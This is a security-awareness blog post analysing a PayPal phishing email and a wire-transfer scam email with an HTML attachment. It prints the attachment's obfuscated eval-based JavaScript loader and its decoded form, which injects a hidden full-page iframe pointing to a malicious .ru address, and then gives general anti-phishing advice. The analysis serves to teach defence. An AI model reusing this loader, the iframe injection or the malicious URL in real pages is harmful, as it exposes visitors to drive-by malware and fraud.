CIP Cyber

Log In
Menu
Log In
  • Opinion
  • Product Reviews
  • Industrial Cybersecurity
  • Videos

PayPal & Wire Transfer Scam – Email Scam

Table of Contents

Scammer
are active and they usually active to make an innocent fool and to
steal the confidential information and money, every day thousands of
email are sending by the spammer an email filter can easily filter
these email and spam them like the powerful spam filter of gmail and
yahoo but sometimes the spammers uses some new techniques to bypass
these filters.  Now a day the private email exchange server
(private company email servers) are the target of these spammers.



You
might have heard about the spamming on social media channels like
facebook spam, LinkedIn spam and so on, the danger situation is the
spam email that has an ability to steal the financial information of
the victim, look at this scam below


I
have just received an email, a paypal spam email. We can easily say
that this is not a legitimate email because it starts with “Dear
Pay Pal user” but paypal always writes the name of the customer.
You can see that the spammers has just put the hyper link on some
text, the links are not the paypal links but the spammer website
links, the target website might have some malware or a phishing page
of paypal or it simply redirect you to another website.


The
second email from the spammer is wire transfer email, look at the
picture:


The
spammers has attached a HTML file and said that this is the Internet
explorer file, means they want receiver to open it on Internet
explorer, since IE more vulnerable then other browsers so the more
chance of success.


Lets
analyze it:


This
is the HTML file that contain the code:


<html>
<head> <meta http-equiv=”Content-Type”
content=”text/html; charset=utf-8″>
<title>page15</title> </head> <body><style>
body { margin: 0;} #iframe_box {position: absolute; overflow: auto;
margin: 0; width: 100%; height: 100%;} </style>
<script>c=3-1;i=-2+c;if(parseInt(“0″+”1″+”2″+”3″)===83)try{Boolean().prototype.q}catch(egewgsd){if(window.document)f=[‘-30i78i57i74i-8i58i71i80i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i-8i-30i58i71i80i6i65i60i-8i21i-8i-1i65i62i74i57i69i61i55i58i71i80i-1i19i-8i-30i58i71i80i6i75i74i59i-8i21i-8i-1i64i76i76i72i18i7i7i79i65i75i67i71i70i75i65i70i76i72i57i74i57i6i74i77i18i16i8i16i8i7i65i69i63i7i23i72i74i71i69i71i21i70i57i59i64i57i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i75i76i81i68i61i6i71i78i61i74i62i68i71i79i-8i21i-8i-1i64i65i60i60i61i70i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i57i72i72i61i70i60i27i64i65i68i60i0i58i71i80i1i19’][0].split(‘i’);v=”ev”+”a”+”l”;}if(v)e=window[v];w=f;s=[];r=String;for(;204!=i;i+=1){j=i;s=s+r[“f”+”r”+”omC”+”har”+”Code”](w[j]*1+40);}
if(v)z=s;e(z);</script></body> </html>


It
seems to be the Java code and I have decrypted it:


//eval
var box = document.createElement(‘iframe’); box.id = ‘iframe_box’;
box.src = ‘http://wiskonsintpara.ru:8080/img/?promo=nacha’;
document.body.style.overflow = ‘hidden’;
document.body.appendChild(box); //jsunpack.called CreateElement
iframe //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha
//jsunpack.url var s = var box = document.createElement(‘iframe’);
box.id = ‘iframe_box’; box.src =
‘http://wiskonsintpara.ru:8080/img/?promo=nacha’;
document.body.style.overflow = ‘hidden’;
document.body.appendChild(box); //jsunpack.url var z = var box =
document.createElement(‘iframe’); box.id = ‘iframe_box’; box.src =
‘http://wiskonsintpara.ru:8080/img/?promo=nacha’;
document.body.style.overflow = ‘hidden’;
document.body.appendChild(box); //jsunpack.url var newurl = var box
= document.createElement(‘iframe’); box.id = ‘iframe_box’; box.src
= ‘http://wiskonsintpara.ru:8080/img/?promo=nacha’;
document.body.style.overflow = ‘hidden’;
document.body.appendChild(box);




It
is some sort of the iframe injection attack and the final destination
or URL is




//jsunpack.called
CreateElement iframe //jsunpack.url
http://wiskonsintpara.ru:8080/img/?promo=nacha




It
is not a bank website but a URL of the malicious website.




So
the conclusion is very simple never trust on any malicious email
because such a emails are nothing but a way to steal your money,
educate the people around you because the security awareness is only
the possible way of online security.


Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription  or become our Facebook fan! You will get all the latest updates at both the places.
CIP Cyber Staff

CIP Cyber Staff

CIP Cyber Staff comprises CIP cybersecurity experts committed to delivering comprehensive information on critical infrastructure protection. The content covers diverse topics, equipping professionals to defend organizations and communities in an ever-evolving cyber landscape.

Most popular

Opinion

Password Cyberattack: Everything You Need to Know

November 7, 2023

Industrial Cybersecurity

Cybersecurity Awareness Month: Spotlight on ICS/OT Security

September 28, 2023

Opinion

How to Protect IoT Devices in Critical Infrastructure Networks

September 15, 2023

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Choose Training

Related Articles

What Proxies Are For

When you cannot access certain sites or hide your identity, you need a tool for that. For example, the USA proxies are in demand among

March 24, 2022

Want always be up to date?

Don't miss the latest news

By subscribing to our mailing list, you will be enrolled to receive our new trainings, latest blog posts, product news, and more.

CIP Training & Certifications

Transform your cybersecurity skills with CIP Cyber’s comprehensive training & course offerings

Choose Training